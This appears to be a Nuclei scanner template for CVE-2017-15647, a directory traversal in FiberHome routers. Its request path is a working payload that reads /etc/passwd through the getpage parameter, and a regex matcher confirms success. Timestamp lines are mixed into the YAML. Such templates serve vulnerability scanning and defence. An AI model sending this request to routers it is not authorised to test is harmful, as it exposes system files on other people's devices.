2021-07-27 11:36:29 +00:00
id : CVE-2017-15647
info :
name : FiberHome - Directory Traversal
author : daffainfo
severity : medium
description : On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
2021-08-18 11:37:49 +00:00
reference :
2021-07-27 11:36:29 +00:00
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
tags : cve,cve2017,lfi,router
requests :
- method : GET
path :
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
- type : status
status :
- 200